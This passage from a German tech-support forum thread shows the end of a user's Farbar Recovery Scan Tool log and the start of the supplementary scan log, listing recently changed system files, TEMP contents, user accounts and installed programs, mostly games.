2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-11 20:53 - 2017-06-20 07:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 06:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-07-11 20:53 - 2017-06-20 06:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv
2017-07-11 20:53 - 2017-06-20 06:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-07-09 18:39 - 2017-07-09 18:55 - 000000000 ____D C:\Users\****\Documents\SimCity
2017-07-09 18:26 - 2017-07-09 18:59 - 000001008 _____ C:\Users\Public\Desktop\SimCity™.lnk
2017-07-09 18:26 - 2017-07-09 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-06 01:14 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-06 01:14 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Roaming\Spotify
2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Local\Spotify
2017-08-06 01:11 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-06 01:11 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-06 01:11 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2
2017-08-06 00:58 - 2017-04-19 20:20 - 003861696 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-06 00:58 - 2017-03-20 06:35 - 001882280 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-06 00:58 - 2017-03-20 06:35 - 000473418 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-06 00:53 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-06 00:52 - 2017-04-19 20:10 - 000000000 ____D C:\Users\****
2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk
2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\****\AppData\Roaming\MyPhoneExplorer
2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit
2017-08-06 00:19 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit
2017-08-06 00:19 - 2015-03-15 23:24 - 000000000 ____D C:\Users\****\AppData\Roaming\IObit
2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\****\AppData\Local\Battle.net
2017-08-06 00:02 - 2015-03-09 00:28 - 000000000 ____D C:\Users\****\AppData\Local\Ubisoft Game Launcher
2017-08-05 23:39 - 2016-01-03 14:51 - 000000000 ____D C:\Users\****\AppData\Local\CrashDumps
2017-08-05 23:31 - 2015-03-01 21:28 - 000000000 ____D C:\Users\****\AppData\Roaming\Skype
2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games
2017-08-05 23:17 - 2015-03-15 23:24 - 000000000 ____D C:\ProgramData\ProductData
2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-08-05 22:55 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-05 01:39 - 2015-04-10 22:33 - 000000000 ____D C:\Users\****\AppData\Roaming\TS3Client
2017-08-05 00:32 - 2015-02-07 15:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Dropbox
2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-03 02:07 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\****\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\****\Dropbox
2017-08-01 12:29 - 2017-05-17 19:05 - 000000000 ____D C:\Users\****\AppData\Local\b95cd
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\****\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\****\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\****\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\****\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-31 19:59 - 2015-02-06 18:49 - 000000000 ____D C:\Users\****\AppData\Local\Packages
2017-07-31 19:41 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Local\Discord
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-24 19:38 - 2015-02-06 20:39 - 000000000 ____D C:\Users\****\AppData\Local\Turbine
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 19:33 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2017-07-11 20:56 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-07-11 20:54 - 2015-02-06 20:57 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-07-07 22:12 - 2017-03-31 20:13 - 000000000 ____D C:\Users\****\AppData\Local\Warframe

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\****\AppData\Local\recently-used.xbel
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2015-11-02 23:41 - 2015-11-02 23:41 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat


Einige Dateien in TEMP:
====================
2017-08-06 00:26 - 2017-08-06 00:26 - 000066048 _____ () C:\Users\****\AppData\Local\Temp\Execute2App.exe
2017-08-05 23:51 - 2017-05-12 00:34 - 000037376 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
2017-08-05 23:51 - 2017-05-12 00:03 - 000020480 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiRezLauncherControls.dll
2017-08-06 00:27 - 2017-08-06 00:27 - 000740416 _____ (Oracle Corporation) C:\Users\****\AppData\Local\Temp\jre-8u144-windows-au.exe
2017-08-06 00:26 - 2016-12-09 09:03 - 000568832 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcp90.dll
2017-08-06 00:26 - 2016-12-09 09:03 - 000655872 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcr90.dll

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-01 03:15

==================== Ende von FRST.txt ============================
         

Alt 06.08.2017, 00:28   #19
Lost_Viking
 



And the other one. I hope it fits into one file now.

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 31-07-2017
durchgeführt von ***** (06-08-2017 01:16:42)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version:  - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 31.4.25 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version:  - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version:  - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version:  - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version:  - Bethesda Game Studios)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version:  - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.78 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
